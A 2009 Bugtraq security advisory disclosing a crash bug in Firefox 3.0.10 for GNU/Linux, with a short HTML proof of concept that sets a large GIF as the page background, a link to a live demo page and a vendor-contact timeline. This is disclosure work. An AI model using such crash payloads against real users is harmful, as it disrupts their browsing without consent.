Date: Tue, 9 Jun 2009 21:18:43 -0600
From: y3dips@echo.or.id
To: bugtraq@securityfocus.com
Subject: [ECHO_ADV_110$2009] Firefox (GNU/Linux version) <= 3.0.10 Denial
Of Services
X-Virus-Scanned: antivirus-gw at tyumen.ru
____________________ ___ ___ ________
\_ _____/\_ ___ \ / | \\_____ \
| __)_ / \ \// ~ \/ | \
| \\ \___\ Y / | \
/_______ / \______ /\___|_ /\_______ /
\/ \/ \/ \/ .OR.ID
ECHO_ADV_110$2009
--------------------------------------------------------------------------------
[ECHO_ADV_110$2009] Firefox (GNU/Linux version) <= 3.0.10 Denial Of Services
--------------------------------------------------------------------------------
Author : Ahmad Muammar W.K (a.k.a) y3dips
Date Found : June, 4th 2009
Location : Indonesia, Jakarta
web : http://e-rdc.org/v1/news.php?readmore=137
Critical Lvl : Moderated
Impact : Browser will automatically shutdown
Where : From Remote
Disclosure Policy: Full Disclosure Policy (RFPolicy) v2.0
http://www.wiretrip.net/rfp/policy.html
--------------------------------------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Firefox is a popular Internet browser from the Mozilla Corporation.
Application : Firefox for GNU/linux
version : Firefox/3.0.10 (X11; Linux i686; U; en)
Also affected for lower version (tested for version 3.0.8 at
Ubuntu 9.0.4)
URL : http://firefox.com
Bugzilla entry : https://bugzilla.mozilla.org/show_bug.cgi?id=496265
Description :
Firefox 3.0.10 (previous version) for GNU/Linux Operating systems are unable to
handle big size of GIF images rendering when it becomes a body backgrounds.
Just use a random size GIF files will crash firefox because of HTML body tag.
--------------------------------------------------------------------------------
Exploit Code:
~~~~~~~~~~~~~~~~
<!-- Firefox 3.0.10 DOS exploit, discovered by
Ahmad Muammar W.K (y3dips[at]echo[dot]or[dot]id)
http://y3dips.echo.or.id
//-->
<html>
<head>
<title>Firefox Exploit</title>
<body background="exploit.gif">
</body>
</html>
live exploit :
http://y3dips.echo.or.id/tempe/ff310expl/
--------------------------------------------------------------------------------
Timeline:
~~~~~~~~~
- 20 - 05 - 2009 bug found
- 04 - 06 - 2009 vendor contacted and adding entry to bugzilla
- 04 - 06 - 2009 vendor response, and there`s a potential patch
- 09 - 06 - 2009 advisory release
--------------------------------------------------------------------------------
Shoutz:
~~~~~~~
~ my family (ana my wife and ali my son)
~ the_day, K-159, negative, hero, az001, rey, and also all echo staff
~ janex vind "waraxe", str0ke, chopstick
~ newbie_hacker[at]yahoogroups.com
~ #e-c-h-o @irc.dal.net
--------------------------------------------------------------------------------
Contact:
~~~~~~~~
y3dips || echo|staff || y3dips[at]echo[dot]or[dot]id
Homepage: http://y3dips.echo.or.id/
-------------------------------- [ EOF ] ---------------------------------------
